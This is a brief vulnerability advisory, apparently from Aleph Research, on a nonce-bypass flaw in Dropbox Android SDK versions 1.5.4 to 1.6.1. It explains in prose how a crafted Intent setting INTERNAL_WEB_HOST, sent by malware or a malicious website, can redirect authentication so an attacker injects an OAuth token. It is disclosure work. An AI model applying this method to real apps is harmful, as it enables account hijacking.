Dropbox Android SDK INTERNAL_WEB_HOST Security Bypass

Aleph Research Advisory





Dropbox Android SDK

Vulnerable Version

Versions 1.5.4 - 1.6.1


Use version 1.6.2 or later.

Technical Details

This vulnerability lets adversaries insert an arbitrary OAuth access token into the Dropbox SDK, completely bypassing a nonce protection. The vulnerable code belongs to the Activity that is responsible for the Dropbox authentication. It consumes various Intent extra parameters. Since the browser can invoke this Activity, it can be launched by both malware and malicious websites with an arbitrary Intent payload. Consumption of a particular Intent extra parameter, named INTERNAL_WEB_HOST, has devastating results. When the browser is used (i.e., the Dropbox app is not installed) to authenticate the user and authorize the app to access the user’s Dropbox account, this parameter eventually controls the host that the browser surfs to. If the attacker can generate an Intent targeting the activity, with INTERNAL_WEB_HOST pointing to his or her server, the authentication process will take place with the nonce sent to the attacker, eventually allowing him to inject the OAuth access token into the DropboxSDK.



External References